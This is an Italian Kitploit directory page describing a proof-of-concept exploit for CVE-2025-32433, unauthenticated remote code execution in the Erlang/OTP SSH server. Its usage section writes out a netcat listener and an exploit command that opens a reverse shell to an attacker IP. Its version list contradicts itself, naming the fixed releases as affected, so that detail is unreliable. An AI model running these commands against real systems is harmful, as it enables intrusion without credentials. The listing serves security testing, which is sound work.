Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE — PoC che mostra l'esecuzione remota di codice non autenticata nel server SSH Erlang/OTP. Sfruttando una vulnerabilità nella gestione dei messaggi del protocollo SSH, un attaccante può eseguire comandi arbitrari sul target senza credenziali valide. | Kitploit
Strumenti/GitHubGitHub/dollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce
Generazione di PayloadAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubdollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce

CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

PoC che mostra l'esecuzione remota di codice non autenticata nel server SSH Erlang/OTP. Sfruttando una vulnerabilità nella gestione dei messaggi del protocollo SSH, un attaccante può eseguire comandi arbitrari sul target senza credenziali valide.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
311 mesi faNon ancora revisionato

CVE-2025-32433 - Erlang/OTP SSH RCE PoC

CVE-2025-32433

Panoramica

PoC che dimostra esecuzione remota di codice senza autenticazione nel server SSH Erlang/OTP.
Sfruttando un difetto nella gestione dei messaggi del protocollo SSH, un attaccante può eseguire comandi arbitrari sul target senza credenziali valide.

  • CVE: CVE-2025-32433
  • Punteggio CVSS: 10.0 (Critico)
  • Versioni interessate:
    • OTP-27.3.3 e precedenti
    • OTP-26.2.5.11 e precedenti
    • OTP-25.3.2.20 e precedenti

Questo problema è stato corretto in OTP-27.3.3, OTP-26.2.5.11 e OTP-25.3.2.20.

Riferimenti

  • Avviso Unit42
  • Repository PoC
  • Scheda NVD

Utilizzo

Configurazione del listener:

root@kitploit:~
nc -lvnp 1234

alt text Esegui l'exploit:

root@kitploit:~
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
  • --rhost : IP del target
  • --rport : Porta SSH del target
  • --lhost : Il tuo IP per la reverse shell
  • --lport : La porta del tuo listener

alt text

alt text

Dichiarazione di non responsabilità

Questo repository è solo a scopo educativo. Non utilizzare questo exploit contro sistemi che non possiedi o per cui non hai esplicita autorizzazione a testare. L'uso improprio può essere illegale ed è severamente vietato.

Scarica lo strumento